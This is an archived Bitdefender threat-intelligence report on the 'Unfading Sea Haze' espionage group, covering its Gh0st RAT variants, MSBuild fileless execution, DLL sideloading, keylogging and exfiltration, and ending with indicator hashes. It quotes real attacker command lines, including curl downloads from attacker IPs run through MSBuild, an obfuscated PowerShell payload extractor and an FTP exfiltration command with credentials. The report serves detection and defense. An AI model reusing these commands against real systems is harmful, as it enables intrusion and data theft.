{ "id": "77a977f5-4ca3-4da2-a1cc-f43f1730fd4b", "created_at": "2026-04-06T00:13:46.058158Z", "updated_at": "2026-04-10T13:12:51.389888Z", "deleted_at": null, "sha1_hash": "4c50848a6102d1db0f0955630e8afcff7528c384", "title": "Deep Dive Into Unfading Sea Haze: A New Threat Actor in the South China Sea", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 575509, "plain_text": "Deep Dive Into Unfading Sea Haze: A New Threat Actor in the South\r\nChina Sea\r\nBy Martin Zugec\r\nArchived: 2026-04-05 21:31:16 UTC\r\nIn a recent investigation by Bitdefender Labs, a series of cyberattacks targeting high-level organizations in South China\r\nSea countries revealed a previously unknown threat actor. We've designated this group \"Unfading Sea Haze\" based on\r\ntheir persistence and focus on the region. The targets and nature of the attacks suggest alignment with Chinese interests.\r\nThis wasn't just about uncovering the present activities of Unfading Sea Haze. It was a journey through time, a digital\r\narchaeology of sorts. Our investigation, spanning at least eight victims – primarily military and government targets –\r\nstretched back to 2018. We documented Unfading Sea Haze’s current tactics, techniques, and procedures (TTPs), but\r\nalso the tools they developed in the past.\r\nAnalyzing multiple generations of their tools was like exploring a museum exposition of cyberespionage relics. We\r\nfound multiple iterations based on the well-known Gh0st RAT framework, alongside various .NET payloads.\r\nBut the investigation revealed a troubling trend beyond the historical context. Notably, the attackers repeatedly regained\r\naccess to compromised systems. This exploitation highlights a critical vulnerability: poor credential hygiene and\r\ninadequate patching practices on exposed devices and web services.\r\nThe extended period of Unfading Sea Haze’s invisibility, exceeding five years for a likely nation-state actor, is\r\nparticularly concerning. Despite extensive cross-referencing of artifacts and scouring public reports, we haven't found\r\nany traces of their previous activities. This research aims to raise awareness of the ongoing threat posed by Unfading Sea\r\nHaze and the importance of robust cybersecurity practices. By sharing our findings, we want to help the security\r\ncommunity with the knowledge to detect and disrupt their espionage efforts.\r\nThis summary provides a high-level overview of the Unfading Sea Haze threat actor's tactics and the evolving nature of\r\ntheir malware arsenal. For a deeper dive, including a detailed analysis of the Gh0st RAT family and other malware\r\nsamples, please refer to the full research paper by Bitdefender Labs.\r\nAttribution\r\nPinpointing the exact culprit behind a cyberattack can be a complex task, and attributing the attacks we investigated to\r\nUnfading Sea Haze was no exception. Here's TL; DR version of our research:\r\nNo Match with a Previous Activity: Our investigation yielded no clear connection to any previously identified\r\nthreat actor. This lack of a known signature led us to designate this group as \"Unfading Sea Haze\".\r\nGeopolitical Targeting: The focus of Unfading Sea Haze's attacks – government and military organizations in\r\nSouth China Sea countries – suggests alignment with Chinese interests.\r\nTool Sharing Among Neighbors: The use of various Gh0st RAT variants, a tool popular with Chinese actors,\r\nhints at a potential network for sharing these tools within the Chinese cyber ecosystem.\r\nhttps://www.bitdefender.com/blog/businessinsights/deep-dive-into-unfading-sea-haze-a-new-threat-actor-in-the-south-china-sea/\r\nPage 1 of 18\n\nTechnique Similarity: One specific technique employed by Unfading Sea Haze – running JScript code through a\r\ntool called SharpJSHandler – resembled a feature found in the \"funnyswitch\" backdoor, which has been linked to\r\nAPT41. Both involve loading .NET assemblies and executing JScript code. However, this was an isolated\r\nsimilarity. No other overlaps with APT41's known tools were identified. This single similarity could be another\r\nindication of shared coding practices within the Chinese cyber threat scene.\r\nThe lack of a definitive match and the presence of these suggestive clues paint a picture of a sophisticated threat actor\r\nwith connections to the Chinese cyber ecosystem. However, more investigation and collaboration are needed to solidify\r\nthis attribution.\r\nAnatomy of an Attack\r\nUnderstanding how these attacks unfolded wasn't straightforward. We didn’t want to focus just on the latest incident.\r\nInstead, we wanted to examine the Unfading Sea Haze threat actor's past activities and any traces they may have left\r\nbehind. This broader investigation, while necessary, made things more complex.\r\nInitial Compromise\r\nUnfortunately, the initial method Unfading Sea Haze used to infiltrate victim systems remains unknown. This initial\r\nbreach happened over six years ago, making forensic evidence scarce and difficult to recover.\r\nHowever, we were able to identify at least one method of regaining access: spear-phishing emails with malicious\r\narchives. These archives contained LNK files disguised as regular documents. When clicked, these LNK files would\r\nexecute malicious commands. We observed multiple spear-phishing attempts occurring in the three months of 2023\r\n(March through May).\r\nHere are some of the email attachment names used:\r\nSUMMARIZE SPECIAL ORDERS FOR PROMOTIONS CY2023\r\nData\r\nDoc\r\nStartechup_fINAL\r\nIn each case, the LNK file was hidden inside a ZIP archive that shared the same name, for example Data.zip\\Data.lnk.\r\nA common tactic used by Unfading Sea Haze was to embed lengthy comments within the LNK file's command line.\r\nThese comments were likely intended to evade detection. We've included a full list of command lines in the full research\r\nwhite paper, but here is an example of this technique:\r\n\"C:\\\\Windows\\\\System32\\\\cmd.exe\" ;Learn English online and improve your skills through our high-quality courses and\r\nresources all designed for adult language learners. Everything you find here has been specially created by the British\r\nCouncil;/c tasklist|findstr /i \"ekrn.exe\"||curl -s -k 159.223.78[.]147/Recorded.log -o\r\nC:\\\\Users\\\\Public\\\\Libraries\\\\Recorded.log\u0026TIMEOUT /T 10\r\n/NOBREAK\u0026C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\MSBuild\r\nC:\\\\Users\\\\Public\\\\Libraries\\\\Recorded.log\u003enul\u0026\u0026echo Trump graduate\r\nWhile comment section and filenames could differentiate, the logic was always the same. Let's break it down step by\r\nstep:\r\nhttps://www.bitdefender.com/blog/businessinsights/deep-dive-into-unfading-sea-haze-a-new-threat-actor-in-the-south-china-sea/\r\nPage 2 of 18\n\nThere is an interesting part where the code checks if a process named ekrn.exe is running (step 3), a process commonly\r\nassociated with ESET Kernel Service. But this check is followed by a logical OR operator (||) and the execution\r\ncontinues only if this process is NOT detected. This suggests that this is either a defense evasion technique, or threat\r\nactors named their own process ekrn.exe, and skip deploying their malware if they find a machine was already\r\ncompromised.\r\nWe were able to download the malicious payload (MD5: 79da81e35600e3d9ec793537d04920c8) from one of the\r\nidentified URLs. Further analysis of the assembly confirmed it's a backdoor program we named SerialPktdoor.\r\nIn March 2024, new archive files for initial access were observed. These archives were mimicking the installation\r\nprocess of Microsoft Defender or exploiting current US political issues. List of archive names follows:\r\ninstall microsoft defender web protection\r\nstart windowsdefender\r\nWlndovvs Deffender User Guide Document\r\nbarack obama's tenure as the 44th president of the united states\r\nPresidency of Barack Obama\r\nAssange_Labeled_an_'Enemy'_of_the_US_in_Secret_Pentagon_Documents102\r\nThese LNK files execute a PowerShell command line similar to the one bellow (or the base64 encoded version of it):\r\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -w Hidden -c \\\"net use\r\nhttp://loadviber.webredirect[.]org;Start-Process -WindowStyle Hidden -WorkingDirectory\r\n\\\\154.90.34[.]83\\exchange\\info C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe\r\nThis is a clever example of a fileless attack that exploits a legitimate tool: MSBuild.exe. MSBuild, short for Microsoft\r\nBuild Engine, is a powerful tool for automating the software build process on Windows. MSBuild reads a project file,\r\nwhich specifies the location of all source code components, the order of assembly, and any necessary build tools.\r\nMSBuild supports various programming languages like C#, C++, and even web development projects. It's a core\r\ncomponent behind popular development environments like Visual Studio.\r\nWhen launching MSBuild, you typically specify a project file as a command-line argument. This project file provides\r\ninstructions on how to build the software. If the project file isn't specified on the command line, MSBuild tries to search\r\nfor a project file within the current working directory by default. If a project file is located, MSBuild will attempt to\r\nexecute the instructions within that file. Here's the key point: this execution happens entirely in memory without ever\r\nwriting the contents of the project file to disk.\r\nhttps://www.bitdefender.com/blog/businessinsights/deep-dive-into-unfading-sea-haze-a-new-threat-actor-in-the-south-china-sea/\r\nPage 3 of 18\n\nIn this attack, the criminals start a new MSBuild process with a twist: they specify a working directory located on a\r\nremote SMB server (like \\154.90.34.83\\exchange\\info in the above example). By setting the working directory to a\r\nremote location, MSBuild will search for a project file on that remote server. If a project file is found, MSBuild will\r\nexecute the code it contains entirely in memory, leaving no traces on the victim's machine.\r\nAnother example showcases a more intricate and obfuscated version of the same technique.\r\n\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ;\\\"Joseph Robinette Biden Jr. (/'ba?d?n/ (listen) BY-d?n; born 20 November 1942) is an American politician who is the 46th and current president of the United States. A\r\nmember of the Democratic Party, he previously served as the 47th vice president from 2009 to 2017 under President\r\nBarack Obama, and represented Delaware in the United States Senate from 1973 to 2009.\\\";$O=$env:tmp;$X=\\\"\r\n(U)_Summary_Complaint_Report.lnk\\\";$Q=\"gci $O -r -ea 0|?{$_.Name -like $X -and $_.Length -eq 205518}|sort\r\nLastWriteTime -desc\";if($Q.Count -gt 0){$X=$Q[0].FullName;};$Y=\r\n[System.IO.File];$K=$Y::ReadALlBytes($X);$Z=$O+\\\"\\\r\n(U)_Summary_Complaint_Report.jpg\\\";$Y::WriteAllBytes($Z,$K[3616..202733]);if(test-path $Z)\r\n{\u0026$Z;};$Z=$O+\\\"\\New_Text_Document_jpg_012.log\\\";$Y::WriteAllBytes($Z,$K[202734..205517]);c:\\w*\\*t\\*4\\v4*\\*d.*e\r\n\"$Z\";\r\nHere's a breakdown of this script block:\r\nThe script starts with a seemingly irrelevant comment about Joseph R. Biden Jr. This is likely an attempt to\r\ndistract from the actual malicious code.\r\nThe PowerShell code extracts a hidden file from another seemingly harmless file. It accomplishes this by\r\nsearching for a specific file named (U)_Summary_Complaint_Report.lnk, extracting a portion of the bytes from\r\nthat file and saving it as a new file named log\r\nThe last line uses complex patterns with wildcards (c:\\w*\\*t\\*4\\v4*\\*d.*e) to represent the path to exe. It then\r\npasses the newly created file (New_Text_Document_jpg_012.log) as a parameter ($Z) to MSBuild.\r\nOn one of the compromised machines, we also found evidence that malicious tools were using Apache httpd.exe,\r\nsuggesting that the attackers might have exploited vulnerabilities in web server software to gain access to systems.\r\nPersistence\r\nThe attackers seem to favor scheduled tasks as a way to establish persistence. Here's what's interesting: scheduled task\r\nnames mimic legitimate Windows files but are combined with DLL sideloading to execute a malicious payload. For\r\nhttps://www.bitdefender.com/blog/businessinsights/deep-dive-into-unfading-sea-haze-a-new-threat-actor-in-the-south-china-sea/\r\nPage 4 of 18\n\nexample, a task named \\microsoft\\windows\\clipsetup\\clipsvc runs the harmless clipsvc.exe program (renamed\r\nmspaint.exe), which in turns loads a malicious library (DLL file).\r\nThis tactic demonstrates how attackers exploited legitimate software. They identified common programs on victim\r\nmachines, like the genuine mspaint.exe located in c:\\\\Windows\\\\WinSxS\\\\amd64_microsoft-windows-mspaint_31bf3856ad364e35_10.0.17763.1697_none_db927d8fc072840a. They then copied this executable and renamed\r\nit to ServerManager.exe. The key here is the new location. Attackers placed this renamed copy in a directory\r\nc:\\\\ProgramData\\\\Microsoft\\\\ServerManager\\\\Events\\\\. Alongside this executable, they placed a malicious DLL file\r\n(msftedit.dll) in the same directory.\r\nWhen the program runs from its unfamiliar location, it searches for DLLs in its current directory. By placing the\r\nmalicious DLL next to the program, the legitimate software gets tricked into loading the attacker's malicious code\r\ninstead of the intended Microsoft DLL.\r\nIn another example of creative application of DLL sideloading, attackers targeted the service with the display name\r\n\"Windows Perception Simulation Service\" (service name perceptionsimulation). This service typically launches a\r\nlegitimate library named %SYSTEM%\\hid.dll located in the system directory. However, the attackers exploited this\r\nprocess by adding their own malicious library hid.dll to folder %SYSTEM%\\perceptionsimulation. This malicious DLL\r\nwould be loaded by the genuine service executable before the legitimate DLL library.\r\nWe discovered a tool named servicemove64.exe that appears to enable the remote deployment of the attack. This tool\r\ntakes a hostname as a parameter, writes the malicious hid.dll file on the targeted remote system, and remotely start the\r\n\"perceptionsimulation\" service, triggering the sideloading of the attacker's DLL.\r\nIt's important to note that the default startup type for this service is \"Manual,\" meaning it wouldn't launch automatically\r\non system startup. However, the existence of the servicemove64.exe tool suggests the attackers might have a method to\r\ninitiate the service after gaining initial access.\r\nWe've written a tech explainer to explain DLL sideloading in more detail, in case you'd like to learn more about how it\r\nworks.\r\nHere is a list of other scheduled task names that we’ve collected:\r\nupdate\r\nbrotherprtdrv\r\nmicrosoftupdate\r\nsynchronizetime222\r\nmicrosoft\\\\windows\\\\wmiprvse\r\nhttps://www.bitdefender.com/blog/businessinsights/deep-dive-into-unfading-sea-haze-a-new-threat-actor-in-the-south-china-sea/\r\nPage 5 of 18\n\nmicrosoft\\windows\\devicesflow\r\nmicrosoft\\\\windows\\\\prod\r\nmicrosoft\\\\windows\\\\coint\r\nmicrosoft\\\\adobeupdate\r\n\\\\microsoft\\\\windows\\\\setwlansvc\\\\mscorsvw\r\n\\\\microsoft\\\\windows\\\\appxdeploymentclient\\\\proactivescan\r\n\\\\microsoft\\\\windows\\\\textservicesframework\\\\synchronizetime222\r\n\\\\microsoft\\\\windows\\\\clipsetup\\\\clipsvc\r\n\\\\microsoft\\\\windows\\\\connection\\\\netsync\r\n\\\\microsoft\\\\windows\\\\services\\\\servermanager\r\nBeyond using scheduled tasks, the attacker employed another persistence technique: manipulating local Administrator\r\naccounts. This involved attempts to enable the disabled local Administrator account, followed by resetting its password.\r\nIn most cases, the attacker hides the newly enabled Administrator account from the login screen by setting a specific\r\nregistry key (HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList).\r\nInterestingly, only two unique passwords were observed for the compromised Administrator accounts:\r\n\"D0ueqw0A_63dJJ\" and \"UxxUtZBcM_x8gSb6IHWvp\".\r\nIn a surprising move for a nation-state threat actor, Unfading Sea Haze has been incorporating Remote Monitoring and\r\nManagement (RMM) tools into their arsenal. Since at least September 2022, they've been utilizing ITarian RMM to gain\r\na foothold on victim networks. This use of a commercially available RMM tool marks a significant deviation from the\r\ntypical tactics employed by nation-state actors.\r\nWe also found evidence suggesting the attacker may have established persistence on web servers, including both\r\nWindows IIS and Apache httpd. Potential methods include web shells or malicious modules designed for these web\r\nserver platforms (IIS modules and httpd modules). However, despite collecting various forensic artifacts, we couldn't\r\ndefinitively determine the exact persistence mechanism due to a lack of crucial information.\r\nExecution\r\nThe Unfading Sea Haze threat actor has created a sophisticated arsenal of custom malware and tools. This section\r\nprovides a high-level overview of the most frequently used components observed during the investigation. For a deeper\r\ndive into the technical specifics of this malware, we recommend referring to the full research whitepaper.\r\nFor several years, dating back to at least 2018, the attackers primarily relied on three types of malicious agents:\r\nSilentGh0st, TranslucentGh0st, and three variants of the .NET agent SharpJSHandler supported by Ps2dllLoader.\r\nStarting in 2023, in an effort to evade detection, the attackers began deploying new malicious components. Ps2dllLoader\r\nhas been replaced with a new mechanism that utilizes msbuild.exe and C# payloads stored on a remote SMB share. Fully\r\nfeatured Gh0stRat variations have been replaced with more modular (plugin-based) variants called FluffyGh0st,\r\nInsidiousGh0st (C++, C#, and Go versions) and EtherealGh0st.\r\nPs2dllLoader\r\nThis collection of malwares was combined with loader we named Ps2dllLoader, which was responsible for loading the\r\n.NET or PowerShell malicious code directly in memory (fileless attack). This functionality allows attackers to bypass\r\nhttps://www.bitdefender.com/blog/businessinsights/deep-dive-into-unfading-sea-haze-a-new-threat-actor-in-the-south-china-sea/\r\nPage 6 of 18\n\ntraditional security measures that might scan files for suspicious code. In 2024, we have discovered an updated version\r\nthat includes AMSI and ETW patching to avoid detection.\r\nAntimalware Scanning Interface (AMSI) is a Windows feature that allows security software to scan code for\r\nmalware before it is executed, which is especially useful for catching malicious PowerShell code. GravityZone\r\nsupports AMSI's capabilities, but we also use proprietary command-line parser to enhance our detection\r\ncoverage.\r\nEvent Tracing for Windows (ETW) is another essential Windows feature. It functions like a system diary,\r\nallowing the operating system and other programs to log important events that occur. This information is valuable\r\nfor security solutions like EDR and XDR. Attackers sometimes attempt to disable ETW as part of their strategy to\r\nbypass detection. To counter this tactic, GravityZone relies on a combination of user-mode and kernel-mode\r\ntechnologies to detect such tampering attempts.\r\nIt's worth noting a possible evolution in the attacker's methods. Ps2dllLoader appears to be taking a backseat to a\r\ndifferent fileless attack technique. As detailed in the \"Initial Compromise\" section, they are increasingly turning to in-memory execution of .NET payloads leveraging MSBuild.exe and remote SMB shares.\r\nSharpJSHandler\r\nOne of the payloads delivered by Ps2dllLoader is SharpJSHandler. It functions like a web shell alternative. This is\r\neven hinted at by the final payload's internal name - noiis.dll. Here, \"No IIS\" suggests the agent acts as an alternative to\r\ntraditional ASP.NET web shells, but without requiring IIS server to be operational.\r\nSharpJSHandler operates by listening for HTTP requests. Upon receiving a request, it executes the encoded JavaScript\r\ncode using the Microsoft.JScript library.\r\nOur investigation also uncovered two additional variations that utilize cloud storage services for communication instead\r\nof direct HTTP requests. We have found variations for DropBox and for OneDrive. In this case, SharpJSHandler\r\nretrieves the payload periodically from a DropBox/OneDrive account, executes it, and uploads the resulting output back\r\nto the same location.\r\nThese cloud-based communication methods present a potential challenge for detection as they avoid traditional web\r\nshell communication channels.\r\nGh0st Army\r\nOur investigation uncovered three primary strains within the Gh0st RAT family, each showcasing a distinct development\r\npath.\r\nThe evolution and different variations of the Gh0st RAT used by Unfading Sea Haze.\r\nhttps://www.bitdefender.com/blog/businessinsights/deep-dive-into-unfading-sea-haze-a-new-threat-actor-in-the-south-china-sea/\r\nPage 7 of 18\n\nMonolithic Versions (SilentGh0st and InsidiousGh0st):\r\nThe initial versions came packed with features, including numerous commands and modules. This very\r\ncomplexity and heavy footprint made them easier targets for security solutions.\r\nSilentGh0st, the oldest variant, later evolved into InsidiousGh0st. This evolution involved streamlining\r\nfunctionality, particularly where redundancy existed across modules.\r\nInterestingly, the language used for development shifted over time. InsidiousGh0st was initially written in\r\nC++, then upgraded to C# for features like SOCKS5 and TCP proxy support, and PowerShell\r\nimprovements. Finally, a Go version emerged, introducing QUIC protocol support (prior versions relied\r\nsolely on TLS over TCP and unencrypted TCP).\r\nModular Versions (TranslucentGh0st, EtherealGh0st, and FluffyGh0st):\r\nThese more recent strains embrace a much more modular approach, emphasizing dynamic plugins and a\r\nlighter overall footprint.\r\nAs we analyzed artifacts from various time periods, another trend emerged: a preference for dynamic behavior by the\r\nattackers. Usernames and passwords transitioned from static values to a more dynamic approach, utilizing random\r\ngeneration. The malware also diversified its C2 infrastructure, employing multiple servers instead of relying on a limited\r\nfew.\r\nAn approximate timeline of Gh0st variations deployment.\r\nThere have been additional tools like SerialPktdoor, Stubbedoor, and SharpZulip. These are described only in the full\r\nresearch whitepaper.\r\nData Collection\r\nOur analysis of collected artifacts strongly suggests the primary objective of these attacks is espionage. The attackers\r\nemployed a combination of custom and off-the-shelf tools to gather sensitive data from victim machines.\r\nxkeylog Keylogger: This custom-made keylogger, named for its frequent export filename, captures keystrokes on\r\ncompromised systems. We encountered it in various forms, including DLL files and shellcode payloads. The attackers\r\nstrategically placed xkeylog DLLs in common locations like c:\\windows\\setup\\cert.dll and c:\\windows\\cursors\\curs.cur.\r\nThese DLLs were likely loaded using the legitimate tool \"regsvr32.exe\". Shellcodes containing xkeylog were executed\r\nthrough various means, including the perceptionsimulation service described in the previous section.\r\nBrowser Data Stealer: This custom tool collects browsing data from compromised machines. The loader used to\r\nexecute the browser stealer is also interesting, as we've observed this same loader used to deploy at least one other tool –\r\na network scanner that remains active in the attacker's current operations. Once loaded in memory and executed, the\r\nbrowser stealer can be customized using command-line arguments. These arguments control the specific actions it takes:\r\nhttps://www.bitdefender.com/blog/businessinsights/deep-dive-into-unfading-sea-haze-a-new-threat-actor-in-the-south-china-sea/\r\nPage 8 of 18\n\nthe stealer parses internal browser database files to extract valuable information, such as cookies. Our analysis revealed\r\nit supports a range of browsers:\r\nGoogle Chrome\r\nFirefox\r\nMicrosoft Edge\r\nInternet Explorer\r\nIn March 2024, we observed a new tool added to the attacker's arsenal: a PowerShell script embedded within\r\nPs2dllLoader samples. This script targets Chrome browser data, parsing internal files to extract sensitive information. It\r\nappears the attackers haven't limited themselves to Chrome, as a similar script targeting the Edge browser has also been\r\nidentified.\r\nScript for extracting encrypted data from Google Chrome\r\nUSB and Windows Portable Devices (WPD) Monitor: This custom tool monitors presence of portable devices. The\r\nmonitoring tool was found at C:\\Users\\\u003cUser\u003e\\AppData\\Roaming\\mscorsvc.dll and is loaded via DLL sideloading. Once\r\nloaded, the tool checks for portable devices every 10 seconds. If a WPD or USB is mounted, it gathers details about the\r\ndevice, and sends them using HTTP GET request to an attacker-controlled server at http://139.180.216[.]33/ico/error/?\r\n\u003ccomputer name\u003e%20\u003cdevice manufacturer\u003e%20\u003cdevice model\u003e%20\u003cdevice friendly name\u003e.\r\nWhile these custom tools provided significant data collection capabilities, the attackers also employed manual\r\ntechniques. We observed instances where they used the common compression tool rar.exe to archive data, specifying\r\nfiles of interest through command-line parameters. They specified file extensions (e.g., .docx, .pdf) and targeted only\r\nfiles modified after a specific date, ensuring they captured the latest data. Similar extraction commands were used to\r\ncollect files from remote systems using net use. The resulting archive was password-protected, ready for extraction.\r\nThe attackers also specifically targeted data from messaging applications like Telegram and Viber. To ensure they could\r\naccess these app's files, they first terminated the running processes (telegram.exe and viber.exe) before using rar.exe to\r\narchive the application data.\r\nThis blend of custom and off-the-shelf tools, along with manual data extraction, paints a picture of a targeted espionage\r\ncampaign focused on acquiring sensitive information from compromised systems.\r\nData Exfiltration\r\nAfter an extensive analysis of the artefacts collected during the investigation, we concluded that the exfiltration process\r\nbetween March1st, 2018 until January 20th, 2022, was performed using a custom tool we’ve named DustyExfilTool.\r\nhttps://www.bitdefender.com/blog/businessinsights/deep-dive-into-unfading-sea-haze-a-new-threat-actor-in-the-south-china-sea/\r\nPage 9 of 18\n\nThis command line tool simplifies data exfiltration: it takes a file path, server IP address, and port as input, and transmits\r\nthe file to the specified server using TLS over TCP for secure communication.\r\nStarting in January 2022, the attackers switched their exfiltration strategy. They abandoned DustyExfilTool in favor of\r\nthe curl utility and FTP protocol. The initial curl command for exfiltration utilized hardcoded credentials\r\nadmin:EH3FqtECXv152 as seen in the following example:\r\ncurl -C - ftp://139.180.221[.]55:80/ -u admin:EH3FqtECXv152 -T c:\\\\windows\\\\addins\\\\fs.tmp\\\r\nHowever, since 2023, a more dynamic approach has been observed. The username and password for the FTP server are\r\nnow changed more frequently, and both credentials appear to be randomly generated. This shift suggests the attackers are\r\nattempting to improve their operational security by employing less predictable credentials.\r\nConclusion and recommendations\r\nThe Unfading Sea Haze threat actor group has demonstrated a sophisticated approach to cyberattacks. Their custom\r\nmalware arsenal, including the Gh0st RAT family and Ps2dllLoader, showcases a focus on flexibility and evasion\r\ntechniques. The observed shift towards modularity, dynamic elements, and in-memory execution highlights their efforts\r\nto bypass traditional security measures. Attackers are constantly adapting their tactics, necessitating a layered security\r\napproach.\r\nHere are some recommendations to mitigate the risks posed by the Unfading Sea Haze threat actor and similar groups:\r\nVulnerability Management: Start with prevention - companies must prioritize patch management to swiftly\r\nidentify and address critical vulnerabilities. Implementing robust processes for patch deployment can\r\nsignificantly reduce the attack surface and mitigate the risk of exploitation. Prioritize addressing vulnerabilities\r\nwith high CVSS scores, particularly for servers exposed to the internet that can lead to remote code execution.\r\nStrong Authentication: Start with enforcing strong password policies that require complex characters and\r\nregular changes. Avoid password reuse across accounts. For an extra layer of protection, enable Multi-Factor\r\nAuthentication (MFA) whenever possible. MFA significantly reduces the risk of unauthorized access even if your\r\npassword is compromised. To future-proof your security posture, consider exploring passwordless authentication\r\noptions compliant with the FIDO2 standard.\r\nProper Network Segmentation: Implementing proper network segmentation and adopting a zero trust\r\nnetworking model are crucial steps in enhancing security posture. By segmenting the network into smaller, more\r\nmanageable zones and enforcing strict access controls based on the principle of least privilege, organizations can\r\nlimit the lateral movement of threat actors and minimize the potential impact of a breach.\r\nMultilayered Defense: Adopting a multilayered security approach is essential. Organizations should invest in a\r\ndiverse range of security controls, including network segmentation and endpoint protection to create overlapping\r\nlayers of defense against cyber threats.\r\nNetwork Traffic Monitoring: Maintain network traffic monitoring to identify unusual communication patterns\r\nthat might indicate remote code execution or cloud storage interactions employed by malware. Additionally, web\r\nfiltering solutions can help block access to malicious websites that might be used for malware distribution.\r\nEffective Logging: Ensure logging is enabled, functional, and provides sufficient information and historical data\r\nfor effective support when needed. Robust logging mechanisms can aid in post-incident analysis, forensic\r\ninvestigations, and monitoring for suspicious activities. Regularly review and update logging configurations to\r\ncapture relevant security events and maintain visibility across the environment.\r\nhttps://www.bitdefender.com/blog/businessinsights/deep-dive-into-unfading-sea-haze-a-new-threat-actor-in-the-south-china-sea/\r\nPage 10 of 18\n\nDetection and Response: Despite your best efforts, it is still possible that modern threat actors will make it past\r\nyour prevention and protection controls. This is where your detection and response capabilities come into play.\r\nWhether you get these capabilities as-a-product (EDR/XDR) or as-a-service (MDR), the purpose is to minimize\r\nthe time when threat actors remain undetected. Bitdefender MDR team conducts a proactive search through an\r\nenvironment to hunt malicious, suspicious, or risky activities that have evaded detection by existing tools.\r\nCollaboration and Information Sharing: Foster collaboration within the cybersecurity community to share\r\nthreat intelligence and best practices. By participating in information-sharing initiatives and collaborating with\r\nindustry peers, organizations can gain valuable insights into emerging threats and enhance their cyber resilience.\r\nAdvanced Threat Intelligence: The right threat intelligence solutions can provide critical insights about attacks.\r\nBitdefender IntelliZone is an easy-to-use solution that consolidates all the knowledge we've gathered regarding\r\ncyber threats and the associated threat actors into a single pane of glass for the security analysts, including access\r\nto Bitdefender’s next-generation malware analysis service. If you already have an IntelliZone account you can\r\nfind additional structured information under Threat ID BDx8y3ujm3X.\r\nThis summary provides a high-level overview of the Unfading Sea Haze threat actor's tactics and the evolving nature of\r\ntheir malware arsenal. For a deeper dive, including a detailed analysis of the Gh0st RAT family and other malware\r\nsamples, please refer to the full research paper by Bitdefender Labs.\r\nIndicators of Compromise\r\nHashes\r\nMD5 Malware Family\r\ncb95ad8fad82eac1c553cd2d7470100b Ps2dllLoader\r\n19dbf2d82f6f95a73f1529636e775295 SilentGh0st\r\n1ce17f0e2a000a889b3f81e80b95f19f DustyExfilTool\r\ne7433f8a0943a6025d43473990ec8068 TranslucentGh0st\r\n6a0933d08d8d27165f72c53df8f1bf04 DustyExfilTool\r\n1dbcd8d2f5718fa7654f8b5f34b88d43 Loader that uses xyz123xyz for AES decryption\r\nac7b8524098cbb423619706ff617b6a6 Network Scanner\r\n95701a74b6b3de68fc375cd08ae8d2c2 SilentGh0st\r\n2e4055e16c1a9274caa182223977eda1 SilentGh0st\r\n7e10d7dd09f5ee2010990701db042f11 WPD USB monitor tool\r\na5af41fda8ef570fda96c64a932d4247 FluffyGh0st\r\n1e55bda0b7eb0aea78577a21f51e8f5c Ps2dllLoader\r\n5421e3cef32e534fa74a26df1c753700 SharpJSHandler, OneDrive variant\r\nhttps://www.bitdefender.com/blog/businessinsights/deep-dive-into-unfading-sea-haze-a-new-threat-actor-in-the-south-china-sea/\r\nPage 11 of 18\n\nb3dc2dcb0f2a5661aed1f4e6d9e88bc6 Ps2dllLoader\r\n4d99127e4b1d27a56f7c4b198739176b .Net loader used by Ps2dllLoader\r\n5bd1eb1166da401c470af2b9e204b2d1 .Net loader used by Ps2dllLoader\r\n2c45c1c35c703bb923b558343f00ea34 Ps2dllLoader\r\n70773eb54234c486c46048ade57db45b Stubbedoor\r\n69310040e872806cb2b00d3addb321a7 Ps2dllLoader\r\n35623ba9f8fcbcf0fce96aa2465b0b66 SharpJSHandler\r\n828faccaaf8e70be1c32ae5588d3df12 Ps2dllLoader\r\n4ec62fdd3d02bc9b81a8c78910b8463a Ps2dllLoader\r\ncff31de1b28f6b00d13d15c2be08a982 SharpJSHandler DropBox variant\r\n7ff8a134c1ee44c915339a74e4a2d3ca Ps2dllLoader\r\ne3fb4c2d591a440cfe6419f5a9825e8 Ps2dllLoader\r\n0dd4603f7c3a80a2408e458fe58b2e60 InsidiousGh0st .NET variant\r\n11c7f264184ed52df4a3836a623845c8 TranslucentGh0st\r\n55a246ace9630b31c43964ebd551e5e2 FluffyGh0st\r\n8c31532f73671995d7f3b6d5814ba726 Ps2dllLoader\r\n5268206fb6c96f614f67cd5d686f42af TranslucentGh0st\r\ncf2f7331a04bb9cd47b58a5c80d4c242 EtherealGh0st\r\n3d87f0bd243cff931bb463fce1d115e3 EtherealGh0st\r\n98de3eeda1adefec31d3e3f00079dd2d EtherealGh0st\r\nb04d9dba3bc922a33c1408d4fbf80678 Ps2dllLoader\r\n35a307b73849a3d7a7cd603a0c4698f2 SerialPktdoor loader\r\n3d879bc2fb28c5abbcd6e08b6e5dc762 InsidiousGh0st\r\n7aba74bfbf5cb068fb52e8813c40f4cd Xkeylog keylogger\r\n510c36c9061778d166e23177a191df35 EtherealGh0st\r\nb6cd3d88a6d6886718b6113147a99901 Malicious C# script\r\n1179f589791c2eaa1ae33f38e62753d0 Malicious C# script\r\n0b744f9d38e125cd4fe14289272ac0e2 InsidiousGh0st\r\nhttps://www.bitdefender.com/blog/businessinsights/deep-dive-into-unfading-sea-haze-a-new-threat-actor-in-the-south-china-sea/\r\nPage 12 of 18\n\n960a964cab127c4f3c726612fdeaeb08 EtherealGh0st\r\n1d2185c956a75a8628e310a38dea4001 InsidiousGh0st\r\n7169179cc18e6aa6c2c36e4bee59f63d EtherealGh0st\r\ncf398f9780de020919daad9ca4a27455 EtherealGh0st\r\n96a43d13fd11464e9898af98cc5bb24b Xkeylog keylogger\r\n14a88779c7e03ecfc19dd18221e25105 EtherealGh0st\r\n2bf96bd44942ca8beed04623a1e19e24 Hid.dll loader\r\nfabdf1094b49673bc0f015cbb986bad5 Hid.dll loader\r\n00bcbeb6ffdadc50a931212eff424e19 EtherealGh0st\r\ne5fc13c39dd81e6de11d1c211f4413ba Xkeylog keylogger\r\n9425f9f7cc393c492deb267c12d031c5 Hid Dropper\r\n551bda0f19bf2705f5f7bd52dcbc021f EtherealGh0st\r\n654163ab9002bd06f68a9f41123b1cd4 EtherealGh0st\r\nfda22f52f0d3a81f095a00810a3dd70a 